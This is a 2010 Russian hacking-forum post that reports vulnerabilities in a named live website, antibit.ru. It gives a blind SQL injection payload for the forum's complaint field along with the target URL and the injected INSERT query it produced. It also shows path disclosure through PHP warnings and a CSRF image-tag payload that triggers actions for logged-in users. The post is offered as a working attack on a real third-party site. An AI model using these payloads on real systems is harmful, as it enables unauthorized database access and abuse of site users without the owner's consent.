23.04.2010, 04:57
|
|
Познающий
Регистрация: 13.04.2010
Сообщений: 42
Провел на форуме:
460968
Репутация:
81
|
|
SQL
SQL-injection в insert-е, вроде как слепая.
Уязвимо поле причина жалобы в форуме когда нажимаем пожаловаться.
http://antibit.ru/forum/topic_101/report/2
вставил
123','123338', 'system', '1271983556', 'no', VERSION())/*
прошло
123','123338', 'system', '1271983556', 'no', VERSION()')/*
обана
PHP код:
INSERT INTO dle_pm (subj, text, user, user_from, date, pm_read, folder) values ('Жалоба на сообщение форума.', 'Данную жалобу вам отправил antichat<br>
Текст жалобы: 123','123338', 'system', '1271983556', 'no', VERSION()')/*<br>
Тема: <a href="http://antibit.ru/index.php?do=forum&showtopic=255">Перейти в тему</a><br>
ID сообщения: 2', 338, 'system', '1271983702', 'no', 'inbox')
Раскрытие путей:
PHP код:
Warning: socket_write(): 21 is not a valid Socket resource in /home/a/antibitru/public_html/engine/classes/icq.class.php on line 239 Warning: socket_close(): 21 is not a valid Socket resource in /home/a/antibitru/public_html/engine/classes/icq.class.php on line 294
http://antibit.ru/icq_send/send/359
CSRF:
Добавляем В ИГНОР:
<img src="http://antibit.ru/ignors/add/358" alt="" />
Последний раз редактировалось life_glider; 23.04.2010 в 20:30..
|
|
|